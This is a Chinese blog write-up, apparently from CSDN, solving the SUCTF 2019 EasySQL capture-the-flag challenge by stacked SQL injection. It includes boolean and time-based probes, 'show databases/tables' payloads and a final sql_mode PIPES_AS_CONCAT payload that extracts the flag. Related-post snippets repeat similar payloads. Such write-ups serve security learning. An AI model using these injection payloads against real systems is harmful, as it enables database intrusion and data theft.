[SUCTF 2019]EasySQL

最新推荐文章于 2024-02-24 14:56:22 发布
最新推荐文章于 2024-02-24 14:56:22 发布
阅读量387 收藏
点赞数
分类专栏: CTF 文章标签: 数据库 mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Brain_Gym/article/details/125024928
版权

题目链接

考点分析

本题考查sql注入相关知识

知识链接

我的上一篇博文

解题步骤

(1) 寻找注入点

首先判断注入参数类型(字符型,数字型)
输入 1' 无报错无回显
输入 1 及任意数字均有回显
(1) => 判断注入类型为数字型
(2) => 判断无法报错注入

(2)尝试注入

发现题目过滤许多关键字 如: union,prepare,handler
试用联合查询 1 order by 2 #
返回

Nonono.

试用布尔盲注1 and length(database())>=1#
返回

Nonono.

试用时间盲注1 and if(length(database())>=1,1,sleep(5))#
返回

Nonono.
但是可以 堆叠注入 一着不慎 全盘皆输
(3) 爆数据库

输入 1;show databases;#
返回

Array ( [0] => 1 ) Array ( [0] => ctf ) Array ( [0] => ctftraining ) Array ( [0] => information_schema ) Array ( [0] => mysql ) Array ( [0] => performance_schema ) Array ( [0] => test )
(4) 爆表

输入 1;show tables;#
返回

Array ( [0] => 1 ) Array ( [0] => Flag )
(5) 决胜时刻

看到Flag近在眼前心中一片窃喜,可是该如何取出它呢?
前面提到许多关键字被过滤,无法使用1;select * from Flag;#查询
在一番尝试后最终未能解出前功尽弃啊~
查阅大佬wp发现比赛时泄露了源码 啊这

select $_GET['query'] || flag from flag

晕,这谁想得到?
于是思路来了:
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode模式:pipes_as_concat 来实现oracle 的一些功能
最终payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
返回

Array ( [0] => 1 ) Array ( [0] => 1flag{3566fcfb-f828-4f84-840f-461d2750e6ed} )

大功告成

素影·流年
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SUCTF 2019 EasySQL
feng的博客
09-14 468
前言 这题又学到了堆叠注入里面的新姿势,这题目真的是太妙了(太阴间了)。 我不知道比赛的时候注入点的源码有没有,如果没给源码也没给hint的话,我只能说: 我注入你mmp,还easysql,easy你mmp。 WP 咱还是看着源码来分析叭。。。不看源码直接注真的阴间。这题一开始可以fuzz,看看过滤了哪些东西。虽然过滤了一部分,但是可以用内敛注释的方式来使用,然后用堆叠注入,用show语句得到数据库和表,然后。。就没然后了。。。 直接看源码: select $post['query']||flag from
_PE_Format.pdf
03-26
_PE_Form_PE_Format.pdf_PE_Format.pdf_PE_Format.pdfat.pdf_PE_Format.pdf_PE_Format.pdf
[suctf 2019]EasySQL
qq_62046696的博客
06-28 1237
打开感觉是一道sql注入的题,发现输入数字 非0都会返回值 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 然后查看表名, 感觉要出来了 ,直接 1; show columns from Flag; 发现flag被过滤,唉就知道没这么简单,看到Flag表,猜测flag应该在Flag中。但是用1;show columns from Flag;无法回显出flag只会回显Nonono. -->说明flag被过滤掉了(注:1;show columns from用来查询
BUUCTF SUCTF 2019]EasySQL
weixin_42675180的博客
09-08 232
BUUCTF SUCTF 2019]EasySQL 数字有回显 1 qq 字母无回显 1;show databases# 1;show tables;# 1;show columns from FLAG;# 被过滤了 猜测源码为 select $_GET[‘query’] || flag from flag 知识点 oracle 支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 不支持。 sql_mode=pipes_as_concat; 来使 || 用作拼接的作用。sql_mode
web-[SUCTF 2019]EasySQL
wojiushilsy的博客
04-09 365
题目要点题目内容解题 题目要点 堆叠注入 sql_mode 题目内容 解题 由官方wp的解释来看,这道题目需要我们去对后端语句进行猜测 通过 输入非零数字得到的回显1和输入其余字符得不到回显来判断出内部的查询语句可能存在有||1,也就是select 输入的数据||内置的一个列名 from 表名,进一步进行猜测即为select post进去的数据||flag from Flag(含有数据的表...
BUUCTF [SUCTF 2019]EasySQL1 writeup(详细版)
热门推荐
m0_62851980的博客
04-10 1万+
考点:堆叠注入,MySQL和mssql中||运算符的区别,运算符的意义转换(操作符重置) 打开靶机,尝试输入1查看回显: 可以看到表格回显了内容:1,用其他非0数字尝试全都回显1,那我们换个数字尝试,比如0: 什么都没有。 使用Sql堆叠注入查看信息,先用show指令查看数据库:1;show databases; 再查看一下表:1;show tables; 看到Flag表,猜测flag应该在Flag中。 但是直接select flag from Flag查询是查不...
web:[SUCTF 2019]EasySQL
sleepywin的博客
09-25 939
将”||”视为字符串的连接操作符而非或运算符,这和Oracle数据库是一样的,也和字符串的拼接函数Concat相类似.SELECT * 和 SELECT 所有列,两者差别几乎可忽略。所以查询所有字段(或者大多数字段)的时候,可以用select *来操作。|| 逻辑或的短路:a||b计算机发现a是真,那么输出a;如果a是假,那么输出bselect 1 from :建立一个临时列,这个列的所有初始值都被设为1。Mysql中的||0 || 1 = 13 || 4 = 10 || 0 = 0。
[SUCTF 2019]EasySQL1 题目分析与详解
最新发布
2302_79800344的博客
02-24 2246
EasySQL
suctf 2019 easysql怎么解
03-28
题目链接:http://easysql.suctf2019.cn:8888/ 题解 进入网站后,可以看到一个登录页面,尝试使用常见的一些弱口令进行登录,发现均不可行。故考虑其他方式进入系统。 点击右上角的注册按钮,可以看到注册页面。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值